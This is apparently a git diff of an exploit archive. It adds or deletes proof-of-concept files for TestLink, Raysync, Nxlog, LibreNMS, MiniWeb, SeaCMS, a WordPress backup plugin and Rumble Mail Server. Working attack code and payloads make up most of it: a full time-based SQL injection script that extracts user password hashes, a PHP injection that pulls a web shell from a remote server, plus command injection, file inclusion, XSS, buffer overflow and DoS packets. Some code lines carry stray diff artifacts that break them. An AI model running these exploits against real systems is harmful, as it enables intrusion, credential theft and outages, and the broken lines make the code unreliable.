+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ *            ...)
+ * {
+ *   ...
+ *       if (freed == BAI (ptr)->signature)
+ *         fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <babl/babl-memory.h>
+
+int main(int argc, char **argv) {
+    void *buf = babl_malloc(42);
+    babl_free(buf);
+    // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+    babl_free(buf);
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/remote/44349.md b/exploits/linux/remote/44349.md
deleted file mode 100644
index 5dbfe5a85..000000000
--- a/exploits/linux/remote/44349.md
+++ /dev/null
@@ -1,68 +0,0 @@
-# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046)
-Vendor Home Page: http://testlink.org
-
-Disovered At: Indishell Lab
-
-CVE ID: CVE-2018-7466
-
-///////////
-//OverView
-///////////
-
-Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution.
-Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in  "TestLink DB login" field.
-After successful installation, PHP code will get save in config file.
-
-
-Exploitation
-
-During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.
-
-Script save MySQL server host, username and password in config file.
-
-Here attacker can take advantage of this process to write PHP code in config file.
-
-To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).
-
-To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps
- 
- -> comment out skip-networking  as well as bind-address (if any present in my.cnf )i.e change line 
- 
- 			skip-networking 
-    		to 
-			# skip-networking
-    
-		and 
-    
-			bind-address    = some_ip
-			to
-			#bind-address = some_ip
-  
-	save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP
- 
- Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script.
- 
- When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
-   
- 	"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"
- 
- Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name
-"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
-
-    http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
-
-It will dump PHP web shell in base directory with name ica.php.
-
-![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png)
-
---==[[ Greetz To ]]==--
-
-	Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
-	Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
-	Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
-	Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
-
---==[[Love to]]==--
-
-	My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
-	Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
\ No newline at end of file
diff --git a/exploits/linux/webapps/49265.txt b/exploits/linux/webapps/49265.txt
new file mode 100644
index 000000000..1a676ee59
--- /dev/null
+++ b/exploits/linux/webapps/49265.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Raysync 3.3.3.8 - RCE
+# Date: 04/10/2020
+# Exploit Author: XiaoLong Zhu
+# Vendor Homepage: www.raysync.io
+# Version: below 3.3.3.8
+# Tested on: Linux
+
+step1: run RaysyncServer.sh to build a web application on the local
+
+environment, set admin password to 123456 , which will be write to
+
+manage.db file.
+
+step2: curl "file=@manage.db" http://[raysync
+ip]/avatar?account=1&UserId=/../../../../config/manager.db
+
+to override remote manage.db file in server.
+
+step3: login in admin portal with admin/123456.
+
+step4: create a normal file with all permissions in scope.
+
+step5: modify RaySyncServer.sh ,add arbitrary evil command.
+
+step6: trigger rce with clicking "reset" button
\ No newline at end of file
diff --git a/exploits/multiple/dos/49283.txt b/exploits/multiple/dos/49283.txt
new file mode 100644
index 000000000..4de592ae7
--- /dev/null
+++ b/exploits/multiple/dos/49283.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
+# Date: 15/12/2020
+# Exploit Author: Guillaume PETIT
+# Vendor Homepage: https://nxlog.co
+# Software Link: https://nxlog.co/products/nxlog-community-edition/download
+# Version: 2.10.2150
+# Tested on: Linux Debian 10 && Windows Server 2019
+
+#!/usr/bin/python3
+
+import sys
+import time
+import argparse
+from scapy.all import *
+
+def getPayload(args):
+        # IF UNIX
+        if (args.OS == 1):
+                return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
+        # IF WINDOWS
+        elif (args.OS == 2):
+                return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
+
+        # Test
+        elif (args.OS == 3):
+                return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
+
+def runExploit(args,payload):
+        priority = 30
+        message = payload
+        syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
+        send(syslog,verbose=args.DEBUG)
+
+def getArguments():
+        parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
+        parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
+        parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
+        parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
+        parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
+        return parser.parse_args()
+
+def main():
+        args = getArguments()
+        payload = getPayload(args)
+        runExploit(args,payload)
+main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters：ip
+
+payload：";phpinfo();//
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters： file
+
+payload：C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters： checkuser
+
+payload："><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
